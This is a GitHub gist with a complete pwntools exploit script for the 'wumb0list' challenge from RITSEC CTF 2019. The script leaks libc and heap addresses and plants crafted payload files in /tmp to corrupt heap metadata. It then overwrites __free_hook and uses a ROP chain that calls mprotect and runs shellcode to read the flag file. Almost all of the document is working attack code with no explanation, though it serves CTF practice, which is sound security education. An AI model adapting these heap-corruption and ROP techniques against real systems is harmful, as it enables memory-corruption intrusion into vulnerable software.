Skip to content

Instantly share code, notes, and snippets.

@YiChenChai

YiChenChai/wumb0list.py

Created November 21, 2019 09:45
Show Gist options
  • Save YiChenChai/368c01980ad2d451f92cefbc3f820971 to your computer and use it in GitHub Desktop.
Save YiChenChai/368c01980ad2d451f92cefbc3f820971 to your computer and use it in GitHub Desktop.
Download ZIP
Exploit for wumb0list RITSEC CTF 2019
Raw
wumb0list.py
from pwn import *
# context.log_level = 'debug'
proc = process('./wumb0list')
OFFSET = 0x809c0
FREE_HOOK = 0x3ed8e8
PIVOT = 0x40568
proc.sendlineafter('FAM', '2')
proc.sendlineafter('Back', '1')
proc.sendlineafter('Choose wisely: ', p64(0x603020) + p64(0x6030d8))
proc.sendlineafter('Back', '4')
proc.sendlineafter('Choose wisely: ', '10')
proc.recvuntil('List ')
libcleak = u64(proc.recvuntil('-----------------').replace('-----------------','').rstrip().ljust(8,'\x00'))
libcbase = libcleak - OFFSET
log.info('LIBC leak: 0x%x' % libcleak)
proc.recvuntil('\n')
heapleak = int(proc.recvuntil(':')[:-1])
log.info('Heap leak: 0x%x' % heapleak)
pause()
impf = open('/tmp/die', 'wb+')
payload = p64(0x4092384748393046)
payload += p64(2)
payload += p64(217)
payload += p64(0x48)
payload += ('\x00' * 0x20 + p64(0) + p64(0x71)).ljust(0x48, '\x00')
payload += p64(217 * 2)
payload += p64(0x48)
payload += (p64(0x70) + p64(0x11) + p64(0x10) + p64(0x1)).ljust(0x48, '\x00')
impf.write(payload)
impf.close()
proc.sendlineafter('Back', '8')
proc.sendlineafter('FAM', '1')
proc.sendlineafter('Back', '4')
proc.sendlineafter('Choose wisely: ', '/tmp/die')
proc.sendlineafter('Back', '5')
proc.sendlineafter('FAM', '2')
proc.sendlineafter('Back', '1')
proc.sendlineafter('Choose wisely: ', p64(heapleak + 0x14a0) + p64(0))
proc.sendlineafter('Back', '2')
proc.sendlineafter('Choose wisely: ', '10')
proc.sendlineafter('Back', '8')
proc.sendlineafter('FAM', '1')
proc.sendlineafter('Back', '2')
proc.sendlineafter('Choose wisely: ', '217')
impf = open('/tmp/die2', 'wb+')
payload = p64(0x4092384748393046)
payload += p64(1)
payload += p64(218)
payload += p64(0x48)
payload += ('\x00' * 0x20 + p64(0) + p64(0x71) + p64(libcbase + FREE_HOOK)).ljust(0x48, '\x00')
impf.write(payload)
impf.close()
proc.sendlineafter('Back', '4')
proc.sendlineafter('Choose wisely: ', '/tmp/die2')
impf = open('/tmp/die3', 'wb+')
payload = p64(0x4092384748393046)
payload += p64(2)
payload += p64(219)
payload += p64(0x58)
payload += 'whoami'.ljust(0x58, '\x00')
payload += p64(220)
payload += p64(0x58)
payload += p64(libcbase + PIVOT).ljust(0x58, '\x00')
impf.write(payload)
impf.close()
rebase_0 = lambda x : p64(x + libcbase)
rop = ''
rop += rebase_0(0x000000000002155f) # 0x000000000002155f: pop rdi; ret;
rop += p64(0x0000000000603000)
rop += rebase_0(0x0000000000023e6a) # 0x0000000000023e6a: pop rsi; ret;
rop += p64(0x0000000000001000)
rop += rebase_0(0x0000000000001b96) # 0x0000000000001b96: pop rdx; ret;
rop += p64(0x0000000000000007)
rop += rebase_0(0x00000000000439c8) # 0x00000000000439c8: pop rax; ret;
rop += p64(0x000000000000000a - 1)
rop += rebase_0(0x00000000000d0e00)
rop += rebase_0(0x00000000000d2975) # 0x00000000000d2975: syscall; ret;
rop += rebase_0(0x000000000002155f)
rop += p64(0x603000)
rop += rebase_0(0x800b0)
rop += p64(0x603000)
proc.sendlineafter('Back', '4')
proc.sendlineafter('Choose wisely: ', '/tmp/die3')
proc.sendlineafter('Back', '5')
proc.sendlineafter('FAM', '2')
proc.sendlineafter('Back', '1')
proc.sendlineafter('Choose wisely: ', 'A'*160 + rop)
proc.sendlineafter('Back', '2')
proc.sendlineafter('Choose wisely: ', '10')
proc.sendline(asm(pwnlib.shellcraft.amd64.linux.cat('/wumb0list/flag.txt'), arch='amd64'))
proc.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment